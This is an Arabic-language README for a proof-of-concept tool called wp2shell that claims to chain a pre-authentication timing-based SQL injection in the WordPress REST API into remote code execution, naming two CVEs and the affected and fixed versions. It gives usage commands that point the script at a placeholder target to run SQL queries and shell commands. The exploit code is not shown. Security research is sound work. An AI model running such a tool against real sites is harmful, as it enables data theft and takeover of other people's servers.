
بوك (PoC) لثغرة تنفيذ الأكواد عن بُعد (RCE) في ووردبريس الضعيف القياسي لأداة wp2shell.
أول إثبات مفهوم (PoC) من نوعه لثغرة حقن SQL القائم على التوقيت (timing-based) قبل المصادقة، عبر سلسلة التباس مسارات الدُفعات (batch-route confusion) في WordPress REST API (CVE-2026-63030 + CVE-2026-60137)
يحقق تنفيذ الأوامر، دون مجرد محاولة كسر كلمة مرور المسؤول.
الإصدارات المتأثرة: WordPress 6.9.0–6.9.4 و7.0.0–7.0.1. تم الإصلاح في 6.9.5 و7.0.2.
python3 poc.py https://target.example
python3 poc.py https://target.example 'SELECT DATABASE()'
python3 poc.py https://target.example -c "echo "you got pwned" > /tmp/pwned.txt && id"
الأبحاث: Searchlight Cyber · Aikido · Aikido Intel · WordPress
إخلاء مسؤولية: يُقدَّم إثبات المفهوم هذا حصريًا للأغراض المصرَّح بها: التعليمية، والبحث الأمني، والاستجابة للحوادث؛ أي استخدمه فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.